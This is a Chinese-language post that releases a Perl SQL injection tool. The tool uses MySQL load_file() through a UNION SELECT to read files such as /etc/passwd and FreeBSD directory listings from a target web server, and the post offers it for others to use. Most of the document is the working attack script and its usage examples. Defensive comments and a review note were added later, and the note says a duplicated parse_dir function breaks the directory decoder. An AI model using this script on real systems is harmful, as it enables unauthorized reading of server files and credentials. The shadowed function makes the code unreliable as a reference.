SQL注射中使用Mysql load_file解析bsd目录的脚本


作者:xi4oyu

可能不少x客都知道mysql load_file能够读取文件的内容。但是在bsd平台上,load_file也能够以文件的方式读取目录内容的前512个字节。
以前遇到这种站都是泛着恶心的手工load,然后在一堆可打印字符中查找目录名称。
后来实在扛不住了,得,我还是写个“友爱”的程序来自动解析吧,这样也避免了某些情况下目录被看漏掉。
今天偶尔从硬盘里面翻到的,放出来大家用用吧,有问题反馈下。Thx

xi4oyu@3xpl4b:~$ perl dump_bsd_dir.pl
dump_bsd_dir : List freebsd DIRS USE load_file with MYSQL
By xi4oyu evil.xi4oyu#gmail.com

http://www.pentestday.com

usage: dump_bsd_dir.pl [options]
-u : Inject url
-d|-f : DIR/FILE to list
Ext: dump_bsd_dir.pl -u http://www.xxx.com/index.php?id=-1/**/union/**/select/**/1,FUCKBSD,3 -d /etc
dump_bsd_dir.pl -u http://www.xxx.com/index.php?id=-1/**/union/**/select/**/1,FUCKBSD,3 -f /etc/passwd

#!/usr/bin/perl
# dump_bsd_dir.pl
#
# Proof-of-concept from the post above: through a UNION-based SQL injection
# it makes MySQL's load_file() read the first 512 bytes of a FreeBSD
# directory as if it were a file, and decodes the dirent records found in
# the response.
#
# Defender's note: load_file() only works for a database account that holds
# the FILE privilege and only where secure_file_priv allows it; the web
# application's account should have neither, which removes this read
# primitive entirely.
use strict;
use Getopt::Std;
use LWP::UserAgent;

our %opt;                 # filled by getopts() in the main section

use constant True => 1;   # loop sentinel used by parse_dir

# Placeholder in the -u URL that gets replaced by the generated SQL payload.
my $rep_word   = "FUCKBSD";
# Sentinel concatenated on both sides of load_file()'s output so the
# interesting bytes can be cut out of the surrounding page.
my $sep_flag   = "%!!";
# Browser-looking User-Agent sent with the request.
my $user_agent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;.NET CLR 1.1.4122)";

# Filled from the command line (-u, -d, -f); $target_rep is never used.
my $target     = '';
my $target_rep = '';
my $dir        = '';
my $file       = '';

sub usage{
	# Print the banner and option summary to STDERR, then exit (status 0).
	# $0 is interpolated so the examples show the script's real name.
	my $help = <<"HELP";
dump_bsd_dir : List freebsd DIRS USE load_file with MYSQL
By xi4oyu evil.xi4oyu#gmail.com

http://www.pentestday.com

usage: $0 [options]
-u	: Inject url
-d|-f : DIR/FILE to list
Ext: $0 -u http://www.xxx.com/index.php?id=-1/**/union/**/select/**/1,FUCKBSD,3 -d /etc
 $0 -u http://www.xxx.com/index.php?id=-1/**/union/**/select/**/1,FUCKBSD,3 -f /etc/passwd

HELP
	print STDERR $help;
	exit;
}

sub hex_str{
	# Return the MySQL hex-literal form ("0x" followed by the bytes as
	# lowercase hex) of the given string. An empty string yields just "0x".
	my ($raw) = @_;
	return "0x" . unpack("H*", $raw);
}

# This function parses the FreeBSD dirent struct and prints out the result.

=pod
	src/sys/sys/dirent.h
	Ref:http://fxr.watson.org/fxr/source/sys/dirent.h?v=FREEBSD7
 49
 50 struct dirent {
 51 	__uint32_t d_fileno;		/* file number of entry */
 52 	__uint16_t d_reclen;		/* length of this record */
 53 	__uint8_t  d_type;		/* file type, see below */
 54 	__uint8_t  d_namlen;		/* length of string in d_name */
 55 #if __BSD_VISIBLE
 56 #define MAXNAMLEN 255
 57 	char	d_name[MAXNAMLEN + 1];	/* name must be no longer than this */
 58 #else
 59 	char	d_name[255 + 1];	/* name must be no longer than this */
 60 #endif
 61 };
 62
 63 #if __BSD_VISIBLE
 64 /*
 65  * File types
 66  */
 67 #define DT_UNKNOWN	 0
 68 #define DT_FIFO		 1
 69 #define DT_CHR		 2
 70 #define DT_DIR		 4
 71 #define DT_BLK		 6
 72 #define DT_REG		 8
 73 #define DT_LNK		10
 74 #define DT_SOCK		12
 75 #define DT_WHT		14

=cut

sub parse_dir{
	# Decode a hex string holding the leading bytes of a FreeBSD directory
	# (what load_file() returns for a directory) and print one "type\tname"
	# line per dirent record. Decoding stops at the first record whose
	# d_reclen is 0, or when the input runs out (unpack then yields no
	# d_reclen at all). Record layout per the dirent.h excerpt above:
	# d_fileno (u32), d_reclen (u16), d_type (u8), d_namlen (u8), d_name.
	my $dirent_hex = shift;

	# The first 24 bytes (48 hex digits) are skipped; presumably the "." and
	# ".." records, which would be 12 bytes each — not verified here.
	my $records = substr($dirent_hex, 48);

	# d_type values (dirent.h) that get a label other than "file:".
	my %label_for = (
		4  => "dir:",
		10 => "link:",
		1  => "fifo:",
		12 => "socket:",
		6  => "blk:",
	);

	my $pos = 0;   # offset into $records, in hex digits (two per byte)
	while (1) {
		# Fixed 8-byte header = 16 hex digits. "LSCC" uses the byte order of
		# the host running this script, so the fields are misread if it
		# differs in endianness from the server that produced the bytes.
		my $header_hex = substr($records, $pos, 16);
		my ($fileno, $reclen, $d_type, $namlen) =
			unpack("LSCC", pack("H*", $header_hex));
		last unless $reclen;   # d_reclen of 0, or no header left, ends the list

		my $name_hex = substr($records, $pos + 16, $namlen * 2);
		my $name = unpack("a*", pack("H*", $name_hex));
		$name .= "/" if $d_type == 4;   # mark directories like ls -p
		my $label = $label_for{$d_type} // "file:";
		print "$label\t$name\n";

		$pos += 2 * $reclen;   # advance by d_reclen, converted to hex digits
	}
}

sub get_that_shit{
	# Substitute the SQL payload for $rep_word in the injection URL, send one
	# GET request, and return whatever the page echoed between the two
	# $sep_flag sentinels. Returns the literal string "ERROR" when the
	# sentinels are not found; HTTP failures land there too, because the
	# response status is never checked.
	my $payload = shift;

	(my $url = $target) =~ s/$rep_word/$payload/g;

	# The payload travels in the query string of a plain GET, so it appears
	# verbatim in the server's access log — a simple thing to alert on.
	my $browser = LWP::UserAgent->new;
	$browser->agent($user_agent);
	my $response = $browser->request(HTTP::Request->new(GET => $url));
	my $body = $response->content;

	# "%!!" has no regex metacharacters; greedy .* with /s spans newlines and
	# stretches to the last sentinel in the page.
	return $body =~ /$sep_flag(.*)$sep_flag/sg ? $1 : "ERROR";
}

sub parse_dir{
	# NOTE(review): this is the second `sub parse_dir` in the file. Perl
	# keeps the last definition compiled, so this stub — not the full decoder
	# above — is what the call at the bottom of the script reaches; under
	# `use warnings` Perl would report "Subroutine parse_dir redefined".
	# It does nothing but hand its argument back.
	my $hex_code = shift;
	return $hex_code;
}

#================================================================#
# Here We Go!
#
# Defender's note: the query built below is recognisable as it stands —
# load_file(0x...) wrapped in concat() with a 0x252121 ("%!!") sentinel on
# each side, delivered through a UNION SELECT in a GET parameter. Those are
# plain substrings to match in access logs or a WAF rule; the sentinel also
# shows up in the response body when the read succeeded.

my $opt_string = "u:d:f:";

# No arguments at all: show the help text and stop.
usage() unless @ARGV;

getopts($opt_string, \%opt) or usage();
usage() if $opt{h};   # -h is not in $opt_string, so getopts() fails on it first

$target = $opt{u} if $opt{u};
$dir    = $opt{d} if $opt{d};
$file   = $opt{f} if $opt{f};

# An injection URL plus either a directory or a file is mandatory.
usage() if !$target || (!$dir && !$file);

# Both the path and the sentinel go in as 0x.. hex literals (hex_str). A
# directory read is additionally wrapped in hex() on the server side,
# presumably because the dirent bytes are binary and parse_dir expects hex.
# When -d and -f are both given, -d wins here but -f wins in the output
# branch below, exactly as in the original.
my $sep_flag_hex = hex_str($sep_flag);
my $hexed_str = $dir
	? sprintf('hex(concat(%s,load_file(%s),%s))', $sep_flag_hex, hex_str($dir),  $sep_flag_hex)
	: sprintf('concat(%s,load_file(%s),%s)',      $sep_flag_hex, hex_str($file), $sep_flag_hex);

my $ret_str = get_that_shit($hexed_str);

if ($file) {
	print $ret_str;        # raw file contents, or "ERROR"
} else {
	parse_dir($ret_str);   # hex dirent dump -> one line per entry
}